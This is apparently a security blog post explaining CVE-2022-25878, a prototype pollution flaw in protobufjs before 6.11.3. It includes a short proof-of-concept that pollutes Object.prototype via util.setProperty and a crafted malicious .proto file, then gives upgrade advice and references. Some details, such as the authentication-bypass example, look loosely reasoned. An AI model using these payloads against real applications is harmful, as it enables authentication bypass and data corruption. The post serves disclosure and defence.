CVE-2022-25878 - Understanding and Exploiting Prototype Pollution in ProtobufJS (Before 6.11.3)

CVE-2022-25878 is a critical vulnerability that affected the popular JavaScript package protobufjs before version 6.11.3. This flaw lets attackers manipulate the behavior of all JavaScript objects by injecting malicious properties into Object.prototype—a technique known as prototype pollution. In this post, we’ll break down how this bug works, demonstrate it with example code, explore possible exploitation scenarios, and provide links to references and fixes.

What is Prototype Pollution and Why Does it Matter?

Prototype pollution is a bug where attacker-controlled data can modify the prototype of base objects, such as Object.prototype. In JavaScript, most objects inherit from this. If someone adds a property to it, every object inherits that property—which can have severe consequences, like bypassing security checks or corrupting data logic.

How Does CVE-2022-25878 Happen in ProtobufJS?

ProtobufJS lets developers use Protocol Buffers in JavaScript/Node.js. Versions before 6.11.3 incorrectly handled user-controlled inputs in two places:

The util.setProperty or ReflectionObject.setParsedOption functions

If user data (e.g., parsed from files or input) contains keys like __proto__ or constructor, malicious code can break out of expected object boundaries and touch the core prototype.

Demonstrating the Vulnerability

Below is a minimal example of how this vulnerability can be triggered using a vulnerable version of protobufjs:

Install vulnerable version

npm install protobufjs@6.11.2

Example exploit code

const protobuf = require('protobufjs');

// Malicious input
var payload = {
  "__proto__": {
    "polluted": "Hacked by CVE-2022-25878"
  }
};

// The vulnerable function uses util.setProperty
protobuf.util.setProperty({}, "__proto__", { "polluted": "Hacked by CVE-2022-25878" });

// Now check if all objects are polluted:
console.log({}.polluted); // Prints: Hacked by CVE-2022-25878

// Even new objects are affected
let innocent = {};
console.log(innocent.polluted); // Prints: Hacked by CVE-2022-25878

After running this, all new objects in your Node.js app will have a polluted property out of nowhere!

Exploit Scenario: Uploading a Malicious .proto File

Suppose your application allows users to upload or select .proto schemas (a common RPC scenario). An attacker could craft a file like this:

malicious.proto

syntax = "proto3";

message Evil {
  option (".__proto__") = { polluted: "owned" };
}

When your app loads/uses this, under the hood ProtobufJS parses these options, and the attacker’s field sets a new property on every JavaScript object.

Impact

The impact of prototype pollution depends on how the app uses user-controlled objects. But common cases include:

- Bypassing authentication (e.g., if code checks if (!obj.admin) and now obj.admin always resolves to true)

Upgrade to protobufjs >= 6.11.3 ASAP.

See: GitHub advisory GHSA-g282-3q4w-cxfm

References

- NPM advisory
- SNYK Advisory
- Github Advisory
- Original Patch

Conclusion

CVE-2022-25878 is a severe and classic example of prototype pollution due to insufficient input controls. If your Node.js projects or microservices use protobufjs and accept .proto files—be sure they’re updated and sanitized! Untrusted user input can put your whole app at risk.

*Stay safe, and keep your dependencies up to date!*

Timeline

Published on: 05/27/2022 20:15:00 UTC
Last modified on: 06/08/2022 17:22:00 UTC